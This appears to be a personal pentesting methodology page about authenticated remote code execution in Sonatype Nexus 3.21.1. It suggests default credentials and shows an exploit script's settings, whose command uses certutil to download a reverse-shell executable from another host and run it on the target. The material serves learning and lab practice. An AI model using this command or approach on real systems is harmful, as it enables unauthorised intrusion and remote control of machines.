> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/methodology/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/methodology/readme/exploitation/web-applications/collection-of-vulnerable-apps/sonatype-nexus-3.21.1.md).

# Sonatype Nexus 3.21.1

This application is vulnerable to Remote Code Execution with valid credentials.&#x20;

This is the catch in this case. We've got to try different default credentials, even nexus:nexus or if we are able to maybe see it in an SMB share or FTP server.&#x20;

```
#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'
```

The exploit requires you to send an cmd command which I just change it to make the computer get one of my files. Afterwards we would get a reverse shell.

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2F8m3W4pUdxdYTJmcehubI%2Fimage.png?alt=media\&token=4860817f-4e7e-4d0a-af40-4b69f7ba83e5)
